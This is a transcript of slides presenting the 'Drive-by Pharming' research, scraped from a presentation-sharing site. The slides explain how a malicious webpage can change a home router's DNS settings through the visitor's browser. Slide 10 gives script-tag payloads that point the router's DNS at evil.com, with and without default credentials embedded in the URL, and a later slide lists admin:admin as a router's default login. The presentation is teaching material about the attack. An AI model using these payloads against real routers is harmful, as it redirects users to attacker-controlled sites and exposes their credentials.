1 / 17

Drive-by Pharming

S. Stamm , Z. Ramzan , and M. Jakobsson Presented by Anh Le. Drive-by Pharming. Authors. Sid Stamm - Indiana University - Google Intern. Dr. Zulfikar Ramzan - Technical Director of Symantec Security. Prof. Markus Jacobsson - Indiana University Principal Scientist

karis
Download Presentation

Drive-by Pharming

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. S. Stamm, Z. Ramzan, and M. Jakobsson Presented by Anh Le Drive-by Pharming

  2. Authors Sid Stamm - Indiana University - Google Intern Dr. ZulfikarRamzan - Technical Director of Symantec Security • Prof. Markus Jacobsson • - Indiana University • Principal Scientist • at Palo Alto RC Anh Le - UC Irvine - 2009

  3. Outline • Introduction • Preliminaries and Previous Work • Drive-By Pharming • Demo • New Attacks and Recent Events • Conclusion and Discussion Anh Le - UC Irvine - 2009

  4. 1. Introduction • Motivation: • Total control of home broadband routers • Phishing (by changing DNS setting) • Botnets (by changing firmware) • How: • Attacker sets up an “evil” webpage • Victim visits the evil webpage • Victim’s home router is compromised • No physical proximity required • Enablers: • JavaScript-enabled web browsers • Default password management of the routers Anh Le - UC Irvine - 2009

  5. 2a. Preliminaries • DNS: • Domain Name System What’s IP of yahoo.com? yahoo.com’s IP is 206.190.60.37 Client DNS server (home router) Anh Le - UC Irvine - 2009

  6. 2a. Preliminaries (cont.) • Phishing: • A type of social engineering attack to obtain access credentials • Pharming: • An attack aiming to redirect a website's traffic to another bogus website Anh Le - UC Irvine - 2009

  7. 2b. Previous Work Detecting … … Your internal subnet is10.0.0.0/24! Detecting … … You have a Linksys router, and its IP is 10.0.0.1! Internet • Internal Net Discovery [Kindermann 2003] • Java Applet • Host Scanning [Grossman 2006, SPI Labs 2006] • Java Script • Fingerprint router using default password and image name Anh Le - UC Irvine - 2009

  8. Outline • Introduction • Preliminaries and Previous Work • Drive-By Pharming • Demo • New Attacks and Recent Events • Conclusion and Discussion Anh Le - UC Irvine - 2009

  9. 3. Drive-By Pharming Internet DNS Setting Changed! Anh Le - UC Irvine - 2009

  10. 3. Drive-By Pharming • How is it possible? • HTTP Get Configuration • Off-site script inclusion • How about password-protected? http://10.0.0.1/apply.cgi?dns=new-dns-server.com <scriptsrc=“http://10.0.0.1/apply.cgi?dns=evil.com”></script> <scriptsrc=“http://usr:pwd@10.0.0.1/ apply.cgi?dns=evil.com”></script> Anh Le - UC Irvine - 2009

  11. 3. Drive-By Pharming (cont.) • Assumptions: • JavaScript-Enabled Web Browser • Default Password Management • Vulnerable Routers: • Netgear WGR614 • D-Link DI-524 • Linksys WRT54G • Cisco 806, 826, … • … Anh Le - UC Irvine - 2009

  12. 3. Drive-By Pharming (cont.) • Verizon[Modem + Router]MI424-WR • admin:admin Anh Le - UC Irvine - 2009

  13. 4. Demo Anh Le - UC Irvine - 2009

  14. Outline • Introduction • Preliminaries and Previous Work • Drive-By Pharming • Demo • New Attacks and Recent Events • Conclusion and Discussion Anh Le - UC Irvine - 2009

  15. 5. New Attacks and Recent Events • New Attacks: • Growing Zombies/Botnets • By installing evil firmware • Viral Spread • Router auto-recruits routers • Recent Events: • Kaminsky DNS Vulnerability (July 2008) • cache poisoning attacks on anynameserver! • Router Botnets (March 2009!) Anh Le - UC Irvine - 2009

  16. 5. Conclusion and Discussion • Routers with default password management are easily compromised • Browsers as conduits of attacks to internal network • Army of router botnets Anh Le - UC Irvine - 2009

  17. Anh Le - UC Irvine - 2009

More Related